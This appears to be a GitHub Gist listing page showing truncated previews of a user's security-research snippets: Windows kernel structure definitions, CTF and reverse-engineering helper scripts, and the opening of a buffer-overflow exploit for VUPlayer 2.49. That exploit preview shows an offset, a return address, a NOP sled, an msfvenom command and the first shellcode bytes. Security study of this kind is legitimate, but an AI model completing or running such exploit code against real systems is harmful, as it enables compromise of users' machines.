Mr. Rc HACKE-RC
🌐
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| struct _ETHREAD { | |
| struct _KTHREAD Tcb; | |
| union _LARGE_INTEGER CreateTime; | |
| union _LARGE_INTEGER ExitTime; | |
| struct _LIST_ENTRY KeyedWaitChain; | |
| void *ChargeOnlySession; | |
| struct _LIST_ENTRY PostBlockList; | |
| void *ForwardLinkShadow; | |
| void *StartAddress; | |
| struct _TERMINATION_PORT *TerminationPort; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| struct _KPROCESS { | |
| struct _DISPATCHER_HEADER Header; | |
| struct _LIST_ENTRY ProfileListHead; | |
| unsigned int DirectoryTableBase; | |
| unsigned long Asid; | |
| struct _LIST_ENTRY ThreadListHead; | |
| unsigned long ProcessLock; | |
| unsigned long Spare0; | |
| unsigned int DeepFreezeStartTime; | |
| struct _KAFFINITY_EX Affinity; |
HACKE-RC
/ exploit.py
Created
August 17, 2021 14:11
VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from struct import pack | |
| offest = 1012 | |
| eip = pack("<I", 0x10022F07) | |
| nops = "\x90"*16 | |
| size = 1100 | |
| # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f py Encoder=PexAlphaNum | |
| buf = b"" | |
| buf += b"\xda\xdb\xd9\x74\x24\xf4\xba\x2c\x59\xcf\x98\x58\x2b" |
HACKE-RC
/ Research_1.md
Created
July 5, 2021 14:23
HACKE-RC
/ mangler.py
Created
April 30, 2021 15:06
give '123456789' to any program which plays with it, then get the output and specify it as the first output of the command and then specify your input that you want to mangle in the same way as the second argument
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/env python3 | |
| from sys import argv | |
| work = True if len(argv)>2 else False | |
| if not work: | |
| exit() | |
| pattern = '123456789' | |
| mangled = argv[1] | |
| res = [] |
HACKE-RC
/ auto_exp_cmps.py
Created
April 30, 2021 15:04
it helps in exploiting cmps automatically i guess
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/env python3 | |
| from r2pipe import open as r2open | |
| from pwn import p64, xor | |
| from sys import argv | |
| from pwn import xor | |
| from os import system as run | |
| import fuckpy3 | |
| do_xor = True if len(argv)>1 else exit() | |
| key = int(argv[1].strip(), 16) if argv[1].startswith("0x") else int("0x"+argv[1].strip(), 16) |
HACKE-RC
/ virtual_query_eg_1.c
Last active
April 19, 2021 09:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| int main() | |
| { | |
| MEMORY_BASIC_INFORMATION info; | |
| int ret; | |
| const void *location; | |
| int *vm = VirtualAlloc(NULL, 8, MEM_COMMIT, PAGE_READONLY); | |
| printf("Address of memory returned by VirtualAlloc is %lu\n", vm); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import requests | |
| import time | |
| headers = { | |
| 'Connection': 'keep-alive', | |
| 'Cache-Control': 'max-age=0', | |
| 'Upgrade-Insecure-Requests': '1', | |
| 'Origin': 'http://10.10.228.124', | |
| 'Content-Type': 'application/x-www-form-urlencoded', |
NewerOlder